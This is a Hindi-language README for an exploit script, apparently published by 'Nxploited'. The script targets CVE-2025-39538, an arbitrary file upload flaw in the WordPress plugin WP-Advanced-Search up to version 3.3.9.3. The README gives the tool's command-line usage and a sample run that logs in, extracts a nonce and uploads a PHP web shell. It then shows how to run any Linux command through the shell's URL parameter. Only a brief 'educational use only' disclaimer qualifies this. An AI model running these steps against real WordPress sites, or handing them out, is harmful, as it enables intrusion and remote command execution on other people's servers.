
WordPress WP-Advanced-Search <= 3.3.9.3 - मनमाना फ़ाइल अपलोड भेद्यता
CVE-2025-39538
प्रकाशित: 2025-04-16
भेद्यता प्रकार: मनमाना फ़ाइल अपलोड (खतरनाक प्रकार की फ़ाइल का अनियंत्रित अपलोड)
प्रभावित प्लगइन: WP-Advanced-Search (मैथ्यू चार्टियर द्वारा)
प्रभावित संस्करण: 3.3.9.3 तक के सभी संस्करण (3.3.9.3 सहित)
यह भेद्यता एक प्रमाणित हमलावर को प्लगइन द्वारा प्रदान की गई आयात कार्यक्षमता का उपयोग करके सर्वर पर एक दुर्भावनापूर्ण PHP फ़ाइल (जैसे वेब शेल) अपलोड करने की अनुमति देती है। अपलोड की गई फ़ाइल WordPress की अपलोड्स निर्देशिका में रखी जाती है और रिमोट कोड निष्पादन का कारण बन सकती है।
🧱 अपलोड पथ:
wp-content/uploads/2025/04/
यह Python स्क्रिप्ट निम्नलिखित कार्य करती है:
wp_advanced_search_up_nonce निकालती है।usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
अपलोड के बाद, आप अपने शेल तक इस प्रकार पहुँच सकते हैं:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
whoami को किसी भी Linux कमांड से बदलें जिसे आप निष्पादित करना चाहते हैं, उदाहरण के लिए:
id — वर्तमान उपयोगकर्ता ID दिखाता है।pwd — वर्तमान निर्देशिका दिखाता है।ls — फ़ाइलों की सूची दिखाता है।यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
द्वारा: Nxploited | Khaled Alenazi